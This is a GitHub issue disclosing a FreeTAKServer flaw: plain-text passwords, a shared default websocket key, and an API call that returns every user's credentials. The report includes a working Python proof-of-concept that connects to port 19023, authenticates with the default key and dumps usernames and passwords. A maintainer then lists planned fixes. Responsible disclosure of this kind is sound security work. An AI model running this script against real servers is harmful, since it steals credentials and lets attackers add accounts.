Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security vulnerability exposes passwords to unauthorized users in plain text #75

Open
brian7704 opened this issue May 30, 2024 · 1 comment
Open

Security vulnerability exposes passwords to unauthorized users in plain text #75

brian7704 opened this issue May 30, 2024 · 1 comment
Assignees
@naman108
Labels
bug Something isn't working
Milestone
2.3

Comments

@brian7704
Copy link

brian7704 commented May 30, 2024
edited
Loading

Hi guys,

I was checking out the websocket API on my server and found a vulnerability. This vulnerability allows an unauthorized user that can access port 19023 on a FreeTAKServer with the default configuration to see all the usernames and passwords on that server in plain text. An attacker could also add a user for themselves or do anything else documented in the websocket API. This vulnerability is caused by a few issues

  • Passwords are stored in the database in plain text
  • The default websocket API key is {"Authenticate": "YourWebsocketKey"} on all installations of FTS as far as I can tell
  • The systemUsers websocket API call returns all users along with their plain text passwords

This vulnerability can be partially mitigated by changing FTS_WEBSOCKET_KEY in /opt/FTSConfig.yml and WEBSOCKETKEY in the UI's config.py. However this would only prevent unauthorized users from seeing passwords in plain text. Authorized users would still be able to see each other's passwords.

Below is a proof of concept script which has been tested and confirmed working on all versions from at least 2.0.21 from March 2023 up to the current version. Older versions may also be affected. The requirements to run this script against an FTS server with version 2.1.3 and older are

pip3 install python-socketio==4.6.0
pip3 install python-engineio==3.13.2
pip3 install socketio

And for FTS servers 2.1.4.5 and up

pip3 install python-socketio -U
pip3 install python-engineio -U
pip3 install socketio

To run the script you must specify your FTS server's address, for example

python3 vulnerability_script.py localhost

import socketio
import sys

sio = socketio.Client()

@sio.event
def connect():
    print('connection established')
    sio.emit("authenticate", '{"Authenticate": "YourWebsocketKey"}')

@sio.event
def userUpdate(data):
    print(data)
    sio.disconnect()

@sio.event
def systemUsersUpdate(data):
    print(data)
    sio.emit("users")

@sio.event
def authentication(data):
    print("Authentication successful")
    sio.emit("systemUsers")

@sio.event
def disconnect():
    print('disconnected from server')


sio.connect('http://' + sys.argv[1] + ':19023')
sio.wait()
@brothercorvo brothercorvo added this to the 2.3 milestone Jun 9, 2024
@brothercorvo brothercorvo transferred this issue from FreeTAKTeam/FreeTakServer Jun 9, 2024
@brothercorvo brothercorvo added the bug Something isn't working label Jun 9, 2024
@brothercorvo
Copy link
Contributor

@brian7704 thank you to point this out. we are going to take the following measures:

  1. encrypt the password in the DB
  2. generate a random websocketkey
  3. implement https for all the relevant APIs

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@naman108 naman108

Labels
bug Something isn't working
Projects
None yet
Milestone
2.3
Development

No branches or pull requests
3 participants
@brian7704 @naman108 @brothercorvo